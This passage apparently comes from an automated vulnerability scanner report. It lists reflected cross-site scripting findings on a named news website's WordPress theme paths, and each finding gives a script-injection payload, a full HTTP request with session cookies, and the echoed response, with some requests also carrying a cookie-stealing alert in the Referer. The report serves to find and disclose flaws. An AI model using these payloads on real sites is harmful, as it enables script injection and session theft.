<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentf38a4\"><script>alert(1)</script>d37d4df7c69/themes/shadow/facebox/facebox.js'; }); return true;" >
...[SNIP]...

4.327. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a138e"><script>alert(1)</script>60422d391c9 was submitted in the REST URL parameter 2. This input was echoed as a138e\"><script>alert(1)</script>60422d391c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesa138e"><script>alert(1)</script>60422d391c9/shadow/facebox/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themesa138e\"><script>alert(1)</script>60422d391c9/shadow/facebox/facebox.js'; }); return true;" >
...[SNIP]...

4.328. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7308c"><script>alert(1)</script>3ee816aebbb was submitted in the REST URL parameter 3. This input was echoed as 7308c\"><script>alert(1)</script>3ee816aebbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow7308c"><script>alert(1)</script>3ee816aebbb/facebox/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:59 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow7308c\"><script>alert(1)</script>3ee816aebbb/facebox/facebox.js'; }); return true;" >
...[SNIP]...

4.329. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd045"><script>alert(1)</script>17569ef3f76 was submitted in the REST URL parameter 4. This input was echoed as cd045\"><script>alert(1)</script>17569ef3f76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/faceboxcd045"><script>alert(1)</script>17569ef3f76/facebox.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:35 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/faceboxcd045\"><script>alert(1)</script>17569ef3f76/facebox.js'; }); return true;" >
...[SNIP]...

4.330. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/facebox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a09c"><script>alert(1)</script>407fb9720e3 was submitted in the REST URL parameter 5. This input was echoed as 3a09c\"><script>alert(1)</script>407fb9720e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox/facebox.js3a09c"><script>alert(1)</script>407fb9720e3 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:24 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox/facebox.js3a09c\"><script>alert(1)</script>407fb9720e3'; }); return true;" >
...[SNIP]...

4.331. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a52"><script>alert(1)</script>839a7f7b5f4 was submitted in the REST URL parameter 1. This input was echoed as 97a52\"><script>alert(1)</script>839a7f7b5f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content97a52"><script>alert(1)</script>839a7f7b5f4/themes/shadow/facebox/jquery-1.2.2.pack.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content97a52\"><script>alert(1)</script>839a7f7b5f4/themes/shadow/facebox/jquery-1.2.2.pack.js'; }); return true;" >
...[SNIP]...

4.332. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c5b"><script>alert(1)</script>931c5c5546f was submitted in the REST URL parameter 2. This input was echoed as a4c5b\"><script>alert(1)</script>931c5c5546f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesa4c5b"><script>alert(1)</script>931c5c5546f/shadow/facebox/jquery-1.2.2.pack.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:41 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themesa4c5b\"><script>alert(1)</script>931c5c5546f/shadow/facebox/jquery-1.2.2.pack.js'; }); return true;" >
...[SNIP]...

4.333. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9f02"><script>alert(1)</script>494bbf461e3 was submitted in the REST URL parameter 3. This input was echoed as f9f02\"><script>alert(1)</script>494bbf461e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadowf9f02"><script>alert(1)</script>494bbf461e3/facebox/jquery-1.2.2.pack.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:17 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadowf9f02\"><script>alert(1)</script>494bbf461e3/facebox/jquery-1.2.2.pack.js'; }); return true;" >
...[SNIP]...

4.334. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298fa"><script>alert(1)</script>096af0f6e63 was submitted in the REST URL parameter 4. This input was echoed as 298fa\"><script>alert(1)</script>096af0f6e63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox298fa"><script>alert(1)</script>096af0f6e63/jquery-1.2.2.pack.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:00 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox298fa\"><script>alert(1)</script>096af0f6e63/jquery-1.2.2.pack.js'; }); return true;" >
...[SNIP]...

4.335. http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b148c"><script>alert(1)</script>ed01bd5fa24 was submitted in the REST URL parameter 5. This input was echoed as b148c\"><script>alert(1)</script>ed01bd5fa24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/facebox/jquery-1.2.2.pack.jsb148c"><script>alert(1)</script>ed01bd5fa24 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.jsb148c\"><script>alert(1)</script>ed01bd5fa24'; }); return true;" >
...[SNIP]...

4.336. http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/iepngfix.htc

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6f3d"><script>alert(1)</script>b31a84a4f19 was submitted in the REST URL parameter 1. This input was echoed as d6f3d\"><script>alert(1)</script>b31a84a4f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd6f3d"><script>alert(1)</script>b31a84a4f19/themes/shadow/iepngfix.htc HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:53:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:53:24 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:53:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentd6f3d\"><script>alert(1)</script>b31a84a4f19/themes/shadow/iepngfix.htc'; }); return true;" >
...[SNIP]...

4.337. http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/iepngfix.htc

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18120"><script>alert(1)</script>22d9e782dd3 was submitted in the REST URL parameter 2. This input was echoed as 18120\"><script>alert(1)</script>22d9e782dd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes18120"><script>alert(1)</script>22d9e782dd3/shadow/iepngfix.htc HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:54:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:54:37 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:54:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes18120\"><script>alert(1)</script>22d9e782dd3/shadow/iepngfix.htc'; }); return true;" >
...[SNIP]...

4.338. http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/iepngfix.htc

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90633"><script>alert(1)</script>411b24f9cf was submitted in the REST URL parameter 3. This input was echoed as 90633\"><script>alert(1)</script>411b24f9cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow90633"><script>alert(1)</script>411b24f9cf/iepngfix.htc HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:56:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
